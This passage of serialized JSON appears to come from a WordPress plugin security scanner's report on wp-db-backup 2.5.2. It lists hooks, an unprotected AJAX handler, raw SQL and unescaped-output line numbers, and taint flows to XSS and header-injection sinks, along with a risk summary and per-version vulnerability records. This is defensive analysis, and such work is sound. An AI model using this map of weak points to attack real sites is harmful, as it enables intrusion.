plugin!",500000,23154894,80,1317,"2026-04-08T11:32:00.000Z","4.9",[20,195,22,237,197],"https:\u002F\u002Fbackwpup.com\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbackwpup.5.6.8.zip",83,11,"2026-04-13 14:13:09",{"attackSurface":263,"codeSignals":323,"taintFlows":411,"riskAssessment":534,"analyzedAt":548},{"hooks":264,"ajaxHandlers":311,"restRoutes":315,"shortcodes":316,"cronEvents":317,"entryPointCount":322,"unprotectedCount":322},[265,270,272,276,280,283,287,291,294,297,299,301,303,307],{"type":266,"name":267,"callback":268,"file":52,"line":269},"action","init","init_textdomain",82,{"type":266,"name":267,"callback":271,"file":52,"line":259},"set_page_url",{"type":266,"name":273,"callback":274,"file":52,"line":275},"admin_notices","update_notice",84,{"type":266,"name":277,"callback":278,"file":52,"line":279},"wp_db_backup_cron","cron_backup",85,{"type":266,"name":281,"callback":281,"file":52,"line":282},"wp_cron_daily",86,{"type":284,"name":285,"callback":286,"file":52,"line":219},"filter","cron_schedules","add_sched_options",{"type":284,"name":288,"callback":289,"file":52,"line":290},"wp_db_b_schedule_choices","schedule_choices",88,{"type":266,"name":267,"callback":292,"file":52,"line":293},"perform_backup",147,{"type":266,"name":295,"callback":295,"file":52,"line":296},"admin_menu",150,{"type":266,"name":267,"callback":267,"file":52,"line":298},155,{"type":266,"name":267,"callback":267,"file":52,"line":300},158,{"type":266,"name":295,"callback":295,"file":52,"line":302},160,{"type":266,"name":304,"callback":305,"file":52,"line":306},"admin_head","admin_header",636,{"type":266,"name":308,"callback":309,"file":52,"line":310},"plugins_loaded","wpdbBackup_init",1826,[312],{"action":313,"nopriv":54,"callback":313,"hasNonce":54,"hasCapCheck":54,"file":52,"line":314},"save_backup_time",81,[],[],[318,320],{"hook":277,"callback":277,"file":52,"line":319},679,{"hook":277,"callback":277,"file":52,"line":321},1177,1,{"dangerousFunctions":324,"sqlUsage":325,"outputEscaping":338,"fileOperations":260,"externalRequests":28,"nonceChecks":55,"capabilityChecks":322,"bundledLibraries":410},[],{"prepared":322,"raw":326,"locations":327},4,[328,331,334,336],{"file":52,"line":329,"context":330},380,"$wpdb->get_var() with variable interpolation",{"file":52,"line":332,"context":333},838,"$wpdb->get_results() with variable interpolation",{"file":52,"line":335,"context":333},861,{"file":52,"line":337,"context":333},920,{"escaped":339,"rawEcho":340,"locations":341},20,34,[342,345,347,349,351,353,355,357,359,361,363,365,367,369,371,373,375,377,379,381,383,385,387,389,391,393,394,396,398,400,402,404,406,408],{"file":52,"line":343,"context":344},178,"raw output",{"file":52,"line":346,"context":344},182,{"file":52,"line":348,"context":344},191,{"file":52,"line":350,"context":344},194,{"file":52,"line":352,"context":344},272,{"file":52,"line":354,"context":344},286,{"file":52,"line":356,"context":344},292,{"file":52,"line":358,"context":344},335,{"file":52,"line":360,"context":344},353,{"file":52,"line":362,"context":344},360,{"file":52,"line":364,"context":344},389,{"file":52,"line":366,"context":344},393,{"file":52,"line":368,"context":344},397,{"file":52,"line":370,"context":344},398,{"file":52,"line":372,"context":344},412,{"file":52,"line":374,"context":344},480,{"file":52,"line":376,"context":344},617,{"file":52,"line":378,"context":344},680,{"file":52,"line":380,"context":344},817,{"file":52,"line":382,"context":344},1262,{"file":52,"line":384,"context":344},1281,{"file":52,"line":386,"context":344},1315,{"file":52,"line":388,"context":344},1318,{"file":52,"line":390,"context":344},1320,{"file":52,"line":392,"context":344},1340,{"file":52,"line":392,"context":344},{"file":52,"line":395,"context":344},1404,{"file":52,"line":397,"context":344},1450,{"file":52,"line":399,"context":344},1453,{"file":52,"line":401,"context":344},1463,{"file":52,"line":403,"context":344},1474,{"file":52,"line":405,"context":344},1476,{"file":52,"line":407,"context":344},1484,{"file":52,"line":409,"context":344},1490,[],[412,428,446,455,502,513],{"entryPoint":413,"graph":414,"unsanitizedCount":322,"severity":129},"init (wp-db-backup.php:164)",{"nodes":415,"edges":426},[416,421],{"id":417,"type":418,"label":419,"file":52,"line":420},"n0","source","$_GET",167,{"id":422,"type":423,"label":424,"file":52,"line":343,"wp_function":425},"n1","sink","echo() [XSS]","echo",[427],{"from":417,"to":422,"sanitized":54},{"entryPoint":429,"graph":430,"unsanitizedCount":48,"severity":129},"build_backup_script (wp-db-backup.php:269)",{"nodes":431,"edges":443},[432,435,439,441],{"id":417,"type":418,"label":433,"file":52,"line":434},"$_POST",349,{"id":422,"type":423,"label":436,"file":52,"line":437,"wp_function":438},"update_option() [Settings Manipulation]",351,"update_option",{"id":440,"type":418,"label":433,"file":52,"line":434},"n2",{"id":442,"type":423,"label":424,"file":52,"line":360,"wp_function":425},"n3",[444,445],{"from":417,"to":422,"sanitized":54},{"from":440,"to":442,"sanitized":54},{"entryPoint":447,"graph":448,"unsanitizedCount":322,"severity":129},"save_backup_time (wp-db-backup.php:670)",{"nodes":449,"edges":453},[450,452],{"id":417,"type":418,"label":433,"file":52,"line":451},673,{"id":422,"type":423,"label":424,"file":52,"line":378,"wp_function":425},[454],{"from":417,"to":422,"sanitized":54},{"entryPoint":456,"graph":457,"unsanitizedCount":322,"severity":129},"\u003Cwp-db-backup> (wp-db-backup.php:0)",{"nodes":458,"edges":493},[459,460,461,463,464,467,469,473,475,479,481,484,488],{"id":417,"type":418,"label":419,"file":52,"line":420},{"id":422,"type":423,"label":424,"file":52,"line":343,"wp_function":425},{"id":440,"type":418,"label":462,"file":52,"line":434},"$_POST (x3)",{"id":442,"type":423,"label":436,"file":52,"line":437,"wp_function":438},{"id":465,"type":418,"label":466,"file":52,"line":434},"n4","$_POST (x4)",{"id":468,"type":423,"label":424,"file":52,"line":360,"wp_function":425},"n5",{"id":470,"type":418,"label":471,"file":52,"line":472},"n6","$_POST['cron_schedule']",1180,{"id":474,"type":423,"label":436,"file":52,"line":472,"wp_function":438},"n7",{"id":476,"type":418,"label":477,"file":52,"line":478},"n8","$_POST['cron_backup_recipient']",1186,{"id":480,"type":423,"label":436,"file":52,"line":478,"wp_function":438},"n9",{"id":482,"type":418,"label":433,"file":52,"line":483},"n10",1578,{"id":485,"type":486,"label":487,"file":52,"line":483},"n11","transform","→ deliver_backup()",{"id":489,"type":423,"label":490,"file":52,"line":491,"wp_function":492},"n12","header() [Header Injection]",1081,"header",[494,496,497,498,499,500,501],{"from":417,"to":422,"sanitized":495},true,{"from":440,"to":442,"sanitized":495},{"from":465,"to":468,"sanitized":495},{"from":470,"to":474,"sanitized":495},{"from":476,"to":480,"sanitized":495},{"from":482,"to":485,"sanitized":54},{"from":485,"to":489,"sanitized":54},{"entryPoint":503,"graph":504,"unsanitizedCount":322,"severity":512},"perform_backup (wp-db-backup.php:489)",{"nodes":505,"edges":510},[506,508],{"id":417,"type":418,"label":433,"file":52,"line":507},501,{"id":422,"type":423,"label":436,"file":52,"line":509,"wp_function":438},504,[511],{"from":417,"to":422,"sanitized":54},"low",{"entryPoint":514,"graph":515,"unsanitizedCount":28,"severity":512},"backup_menu (wp-db-backup.php:1127)",{"nodes":516,"edges":529},[517,519,521,522,523,524,525,528],{"id":417,"type":418,"label":433,"file":52,"line":518},1172,{"id":422,"type":423,"label":436,"file":52,"line":520,"wp_function":438},1174,{"id":440,"type":418,"label":471,"file":52,"line":472},{"id":442,"type":423,"label":436,"file":52,"line":472,"wp_function":438},{"id":465,"type":418,"label":477,"file":52,"line":478},{"id":468,"type":423,"label":436,"file":52,"line":478,"wp_function":438},{"id":470,"type":418,"label":526,"file":52,"line":527},"$_POST (x2)",1141,{"id":474,"type":423,"label":424,"file":52,"line":384,"wp_function":425},[530,531,532,533],{"from":417,"to":422,"sanitized":495},{"from":440,"to":442,"sanitized":495},{"from":465,"to":468,"sanitized":495},{"from":470,"to":474,"sanitized":495},{"summary":535,"deductions":536},"The wp-db-backup plugin version 2.5.2 exhibits a mixed security posture. While it demonstrates some good practices like avoiding external HTTP requests and having no bundled libraries, significant concerns arise from its static analysis. The presence of one unprotected AJAX handler presents a direct attack vector. Furthermore, a substantial portion of the code (63%) does not properly escape output, increasing the risk of Cross-Site Scripting (XSS) vulnerabilities. Although taint analysis did not reveal critical or high severity flows, the high number of flows with unsanitized paths warrants attention.\n\nThe plugin's vulnerability history is a major red flag. With four known CVEs, including three high-severity and one medium-severity, the plugin has a track record of significant security flaws. The common vulnerability types point towards a recurring struggle with securing user input against SQL Injection, Cross-Site Request Forgery (CSRF), XSS, and authorization bypasses. The fact that all previously known vulnerabilities are currently patched is positive, but the historical pattern suggests a propensity for introducing such issues.\n\nIn conclusion, while the plugin has no currently unpatched critical vulnerabilities and avoids some common risky practices, its unprotected entry points, poor output escaping, and concerning vulnerability history collectively indicate a moderate to high security risk. Users should be cautious and ensure they are using the latest patched version. The recurring nature of past vulnerabilities suggests a need for more rigorous security auditing during development.",[537,540,542,544,546],{"reason":538,"points":539},"Unprotected AJAX handler",10,{"reason":541,"points":27},"High percentage of unescaped output",{"reason":543,"points":220},"Multiple high severity past CVEs",{"reason":545,"points":240},"Medium severity past CVE",{"reason":547,"points":240},"Flows with unsanitized paths","2026-03-17T05:35:51.874Z",{"wat":550,"direct":559},{"assetPaths":551,"generatorPatterns":554,"scriptPaths":555,"versionParams":556},[552,553],"\u002Fwp-content\u002Fplugins\u002Fwp-db-backup\u002Fjs\u002Fwp-db-backup-admin.js","\u002Fwp-content\u002Fplugins\u002Fwp-db-backup\u002Fcss\u002Fwp-db-backup-admin.css",[],[552],[557,558],"wp-db-backup\u002Fjs\u002Fwp-db-backup-admin.js?ver=","wp-db-backup\u002Fcss\u002Fwp-db-backup-admin.css?ver=",{"cssClasses":560,"htmlComments":562,"htmlAttributes":564,"restEndpoints":565,"jsGlobals":566,"shortcodeOutput":568},[561],"wp-db-backup-admin-wrap",[563],"\u003C!-- Backup Complete! -->",[],[],[567],"window.wp_db_backup_admin_settings",[],{"error":495,"url":570,"statusCode":571,"statusMessage":572,"message":572},"http:\u002F\u002Flocalhost\u002Fapi\u002Fplugins\u002Fwp-db-backup\u002Fbundle",404,"no bundle for this plugin yet",{"slug":4,"current_version":6,"total_versions":574,"versions":575},26,[576,584,594,606,617,630,643,655,669,683,697,711,725,739,753,767,781,795,809,823,837,851,865,879,893,907],{"version":6,"download_url":25,"svn_tag_url":577,"released_at":38,"has_diff":54,"diff_files_changed":578,"diff_lines":38,"trac_diff_url":579,"vulnerabilities":580,"is_current":495},"https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-db-backup\u002Ftags\u002F2.5.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-db-backup%2Ftags%2F2.5.1&new_path=%2Fwp-db-backup%2Ftags%2F2.5.2",[581,582,583],{"id":34,"url_slug":35,"title":36,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"id":65,"url_slug":66,"title":67,"severity":41,"cvss_score":69,"vuln_type":44,"patched_in_version":40},{"id":82,"url_slug":83,"title":84,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"version":113,"download_url":585,"svn_tag_url":586,"released_at":38,"has_diff":54,"diff_files_changed":587,"diff_lines":38,"trac_diff_url":588,"vulnerabilities":589,"is_current":54},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-db-backup.2.5.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-db-backup\u002Ftags\u002F2.5.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-db-backup%2Ftags%2F2.5&new_path=%2Fwp-db-backup%2Ftags%2F2.5.1",[590,591,592,593],{"id":93,"url_slug":94,"title":95,"severity":41,"cvss_score":98,"vuln_type":100,"patched_in_version":6},{"id":34,"url_slug":35,"title":36,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"id":65,"url_slug":66,"title":67,"severity":41,"cvss_score":69,"vuln_type":44,"patched_in_version":40},{"id":82,"url_slug":83,"title":84,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"version":595,"download_url":596,"svn_tag_url":597,"released_at":38,"has_diff":54,"diff_files_changed":598,"diff_lines":38,"trac_diff_url":599,"vulnerabilities":600,"is_current":54},"2.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-db-backup.2.5.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-db-backup\u002Ftags\u002F2.5\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-db-backup%2Ftags%2F2.4&new_path=%2Fwp-db-backup%2Ftags%2F2.5",[601,602,603,604,605],{"id":93,"url_slug":94,"title":95,"severity":41,"cvss_score":98,"vuln_type":100,"patched_in_version":6},{"id":108,"url_slug":109,"title":110,"severity":41,"cvss_score":114,"vuln_type":116,"patched_in_version":113},{"id":34,"url_slug":35,"title":36,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"id":65,"url_slug":66,"title":67,"severity":41,"cvss_score":69,"vuln_type":44,"patched_in_version":40},{"id":82,"url_slug":83,"title":84,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"version":128,"download_url":607,"svn_tag_url":608,"released_at":38,"has_diff":54,"diff_files_changed":609,"diff_lines":38,"trac_diff_url":610,"vulnerabilities":611,"is_current":54},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-db-backup.2.4.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-db-backup\u002Ftags\u002F2.4\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-db-backup%2Ftags%2F2.3.3&new_path=%2Fwp-db-backup%2Ftags%2F2.4",[612,613,614,615,616],{"id":93,"url_slug":94,"title":95,"severity":41,"cvss_score":98,"vuln_type":100,"patched_in_version":6},{"id":108,"url_slug":109,"title":110,"severity":41,"cvss_score":114,"vuln_type":116,"patched_in_version":113},{"id":34,"url_slug":35,"title":36,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"id":65,"url_slug":66,"title":67,"severity":41,"cvss_score":69,"vuln_type":44,"patched_in_version":40},{"id":82,"url_slug":83,"title":84,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"version":618,"download_url":619,"svn_tag_url":620,"released_at":38,"has_diff":54,"diff_files_changed":621,"diff_lines":38,"trac_diff_url":622,"vulnerabilities":623,"is_current":54},"2.3.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-db-backup.2.3.3.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-db-backup\u002Ftags\u002F2.3.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-db-backup%2Ftags%2F2.3.1&new_path=%2Fwp-db-backup%2Ftags%2F2.3.3",[624,625,626,627,628,629],{"id":93,"url_slug":94,"title":95,"severity":41,"cvss_score":98,"vuln_type":100,"patched_in_version":6},{"id":108,"url_slug":109,"title":110,"severity":41,"cvss_score":114,"vuln_type":116,"patched_in_version":113},{"id":123,"url_slug":124,"title":125,"severity":129,"cvss_score":130,"vuln_type":132,"patched_in_version":128},{"id":34,"url_slug":35,"title":36,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"id":65,"url_slug":66,"title":67,"severity":41,"cvss_score":69,"vuln_type":44,"patched_in_version":40},{"id":82,"url_slug":83,"title":84,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"version":631,"download_url":632,"svn_tag_url":633,"released_at":38,"has_diff":54,"diff_files_changed":634,"diff_lines":38,"trac_diff_url":635,"vulnerabilities":636,"is_current":54},"2.3.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-db-backup.2.3.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-db-backup\u002Ftags\u002F2.3.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-db-backup%2Ftags%2F2.3.0&new_path=%2Fwp-db-backup%2Ftags%2F2.3.1",[637,638,639,640,641,642],{"id":93,"url_slug":94,"title":95,"severity":41,"cvss_score":98,"vuln_type":100,"patched_in_version":6},{"id":108,"url_slug":109,"title":110,"severity":41,"cvss_score":114,"vuln_type":116,"patched_in_version":113},{"id":123,"url_slug":124,"title":125,"severity":129,"cvss_score":130,"vuln_type":132,"patched_in_version":128},{"id":34,"url_slug":35,"title":36,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"id":65,"url_slug":66,"title":67,"severity":41,"cvss_score":69,"vuln_type":44,"patched_in_version":40},{"id":82,"url_slug":83,"title":84,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"version":144,"download_url":644,"svn_tag_url":645,"released_at":38,"has_diff":54,"diff_files_changed":646,"diff_lines":38,"trac_diff_url":647,"vulnerabilities":648,"is_current":54},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-db-backup.2.3.0.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-db-backup\u002Ftags\u002F2.3.0\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-db-backup%2Ftags%2F2.2.4&new_path=%2Fwp-db-backup%2Ftags%2F2.3.0",[649,650,651,652,653,654],{"id":93,"url_slug":94,"title":95,"severity":41,"cvss_score":98,"vuln_type":100,"patched_in_version":6},{"id":108,"url_slug":109,"title":110,"severity":41,"cvss_score":114,"vuln_type":116,"patched_in_version":113},{"id":123,"url_slug":124,"title":125,"severity":129,"cvss_score":130,"vuln_type":132,"patched_in_version":128},{"id":34,"url_slug":35,"title":36,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"id":65,"url_slug":66,"title":67,"severity":41,"cvss_score":69,"vuln_type":44,"patched_in_version":40},{"id":82,"url_slug":83,"title":84,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"version":656,"download_url":657,"svn_tag_url":658,"released_at":38,"has_diff":54,"diff_files_changed":659,"diff_lines":38,"trac_diff_url":660,"vulnerabilities":661,"is_current":54},"2.2.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-db-backup.2.2.4.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-db-backup\u002Ftags\u002F2.2.4\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-db-backup%2Ftags%2F2.2.3&new_path=%2Fwp-db-backup%2Ftags%2F2.2.4",[662,663,664,665,666,667,668],{"id":93,"url_slug":94,"title":95,"severity":41,"cvss_score":98,"vuln_type":100,"patched_in_version":6},{"id":108,"url_slug":109,"title":110,"severity":41,"cvss_score":114,"vuln_type":116,"patched_in_version":113},{"id":123,"url_slug":124,"title":125,"severity":129,"cvss_score":130,"vuln_type":132,"patched_in_version":128},{"id":139,"url_slug":140,"title":141,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":144},{"id":34,"url_slug":35,"title":36,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"id":65,"url_slug":66,"title":67,"severity":41,"cvss_score":69,"vuln_type":44,"patched_in_version":40},{"id":82,"url_slug":83,"title":84,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"version":670,"download_url":671,"svn_tag_url":672,"released_at":38,"has_diff":54,"diff_files_changed":673,"diff_lines":38,"trac_diff_url":674,"vulnerabilities":675,"is_current":54},"2.2.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-db-backup.2.2.3.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-db-backup\u002Ftags\u002F2.2.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-db-backup%2Ftags%2F2.2.2&new_path=%2Fwp-db-backup%2Ftags%2F2.2.3",[676,677,678,679,680,681,682],{"id":93,"url_slug":94,"title":95,"severity":41,"cvss_score":98,"vuln_type":100,"patched_in_version":6},{"id":108,"url_slug":109,"title":110,"severity":41,"cvss_score":114,"vuln_type":116,"patched_in_version":113},{"id":123,"url_slug":124,"title":125,"severity":129,"cvss_score":130,"vuln_type":132,"patched_in_version":128},{"id":139,"url_slug":140,"title":141,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":144},{"id":34,"url_slug":35,"title":36,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"id":65,"url_slug":66,"title":67,"severity":41,"cvss_score":69,"vuln_type":44,"patched_in_version":40},{"id":82,"url_slug":83,"title":84,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"version":684,"download_url":685,"svn_tag_url":686,"released_at":38,"has_diff":54,"diff_files_changed":687,"diff_lines":38,"trac_diff_url":688,"vulnerabilities":689,"is_current":54},"2.2.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-db-backup.2.2.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-db-backup\u002Ftags\u002F2.2.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-db-backup%2Ftags%2F2.2.1&new_path=%2Fwp-db-backup%2Ftags%2F2.2.2",[690,691,692,693,694,695,696],{"id":93,"url_slug":94,"title":95,"severity":41,"cvss_score":98,"vuln_type":100,"patched_in_version":6},{"id":108,"url_slug":109,"title":110,"severity":41,"cvss_score":114,"vuln_type":116,"patched_in_version":113},{"id":123,"url_slug":124,"title":125,"severity":129,"cvss_score":130,"vuln_type":132,"patched_in_version":128},{"id":139,"url_slug":140,"title":141,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":144},{"id":34,"url_slug":35,"title":36,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"id":65,"url_slug":66,"title":67,"severity":41,"cvss_score":69,"vuln_type":44,"patched_in_version":40},{"id":82,"url_slug":83,"title":84,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"version":698,"download_url":699,"svn_tag_url":700,"released_at":38,"has_diff":54,"diff_files_changed":701,"diff_lines":38,"trac_diff_url":702,"vulnerabilities":703,"is_current":54},"2.2.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-db-backup.2.2.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-db-backup\u002Ftags\u002F2.2.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-db-backup%2Ftags%2F2.2&new_path=%2Fwp-db-backup%2Ftags%2F2.2.1",[704,705,706,707,708,709,710],{"id":93,"url_slug":94,"title":95,"severity":41,"cvss_score":98,"vuln_type":100,"patched_in_version":6},{"id":108,"url_slug":109,"title":110,"severity":41,"cvss_score":114,"vuln_type":116,"patched_in_version":113},{"id":123,"url_slug":124,"title":125,"severity":129,"cvss_score":130,"vuln_type":132,"patched_in_version":128},{"id":139,"url_slug":140,"title":141,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":144},{"id":34,"url_slug":35,"title":36,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"id":65,"url_slug":66,"title":67,"severity":41,"cvss_score":69,"vuln_type":44,"patched_in_version":40},{"id":82,"url_slug":83,"title":84,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"version":712,"download_url":713,"svn_tag_url":714,"released_at":38,"has_diff":54,"diff_files_changed":715,"diff_lines":38,"trac_diff_url":716,"vulnerabilities":717,"is_current":54},"2.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-db-backup.2.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-db-backup\u002Ftags\u002F2.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-db-backup%2Ftags%2F2.1.5&new_path=%2Fwp-db-backup%2Ftags%2F2.2",[718,719,720,721,722,723,724],{"id":93,"url_slug":94,"title":95,"severity":41,"cvss_score":98,"vuln_type":100,"patched_in_version":6},{"id":108,"url_slug":109,"title":110,"severity":41,"cvss_score":114,"vuln_type":116,"patched_in_version":113},{"id":123,"url_slug":124,"title":125,"severity":129,"cvss_score":130,"vuln_type":132,"patched_in_version":128},{"id":139,"url_slug":140,"title":141,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":144},{"id":34,"url_slug":35,"title":36,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"id":65,"url_slug":66,"title":67,"severity":41,"cvss_score":69,"vuln_type":44,"patched_in_version":40},{"id":82,"url_slug":83,"title":84,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"version":726,"download_url":727,"svn_tag_url":728,"released_at":38,"has_diff":54,"diff_files_changed":729,"diff_lines":38,"trac_diff_url":730,"vulnerabilities":731,"is_current":54},"2.1.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-db-backup.2.1.5.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-db-backup\u002Ftags\u002F2.1.5\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-db-backup%2Ftags%2F2.1.4&new_path=%2Fwp-db-backup%2Ftags%2F2.1.5",[732,733,734,735,736,737,738],{"id":93,"url_slug":94,"title":95,"severity":41,"cvss_score":98,"vuln_type":100,"patched_in_version":6},{"id":108,"url_slug":109,"title":110,"severity":41,"cvss_score":114,"vuln_type":116,"patched_in_version":113},{"id":123,"url_slug":124,"title":125,"severity":129,"cvss_score":130,"vuln_type":132,"patched_in_version":128},{"id":139,"url_slug":140,"title":141,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":144},{"id":34,"url_slug":35,"title":36,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"id":65,"url_slug":66,"title":67,"severity":41,"cvss_score":69,"vuln_type":44,"patched_in_version":40},{"id":82,"url_slug":83,"title":84,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"version":740,"download_url":741,"svn_tag_url":742,"released_at":38,"has_diff":54,"diff_files_changed":743,"diff_lines":38,"trac_diff_url":744,"vulnerabilities":745,"is_current":54},"2.1.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-db-backup.2.1.4.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-db-backup\u002Ftags\u002F2.1.4\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-db-backup%2Ftags%2F2.1.3&new_path=%2Fwp-db-backup%2Ftags%2F2.1.4",[746,747,748,749,750,751,752],{"id":93,"url_slug":94,"title":95,"severity":41,"cvss_score":98,"vuln_type":100,"patched_in_version":6},{"id":108,"url_slug":109,"title":110,"severity":41,"cvss_score":114,"vuln_type":116,"patched_in_version":113},{"id":123,"url_slug":124,"title":125,"severity":129,"cvss_score":130,"vuln_type":132,"patched_in_version":128},{"id":139,"url_slug":140,"title":141,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":144},{"id":34,"url_slug":35,"title":36,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"id":65,"url_slug":66,"title":67,"severity":41,"cvss_score":69,"vuln_type":44,"patched_in_version":40},{"id":82,"url_slug":83,"title":84,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"version":754,"download_url":755,"svn_tag_url":756,"released_at":38,"has_diff":54,"diff_files_changed":757,"diff_lines":38,"trac_diff_url":758,"vulnerabilities":759,"is_current":54},"2.1.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-db-backup.2.1.3.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-db-backup\u002Ftags\u002F2.1.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-db-backup%2Ftags%2F2.1.2&new_path=%2Fwp-db-backup%2Ftags%2F2.1.3",[760,761,762,763,764,765,766],{"id":93,"url_slug":94,"title":95,"severity":41,"cvss_score":98,"vuln_type":100,"patched_in_version":6},{"id":108,"url_slug":109,"title":110,"severity":41,"cvss_score":114,"vuln_type":116,"patched_in_version":113},{"id":123,"url_slug":124,"title":125,"severity":129,"cvss_score":130,"vuln_type":132,"patched_in_version":128},{"id":139,"url_slug":140,"title":141,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":144},{"id":34,"url_slug":35,"title":36,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"id":65,"url_slug":66,"title":67,"severity":41,"cvss_score":69,"vuln_type":44,"patched_in_version":40},{"id":82,"url_slug":83,"title":84,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":40},{"version":768,"download_url":769,"svn_tag_url":770,"released_at":38,"has_diff":54,"diff_files_changed":771,"diff_lines":38,"trac_diff_url":772,"vulnerabilities":773,"is_current":54},"2.1.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-db-backup.2.1.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fwp-db-backup\u002Ftags\u002F2.1.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fwp-db-backup%2Ftags%2F2.1.1&new_path=%2Fwp-db-backup%2Ftags%2F2.1.2",[774,775,776,777,778,779,780],{"id":93,"url_slug":94,"title":95,"severity":41,"cvss_score":98,"vuln_type":100,"patched_in_version":6},{"id":108,"url_slug":109,"title":110,"severity":41,"cvss_score":114,"vuln_type":116,"patched_in_version":113},{"id":123,"url_s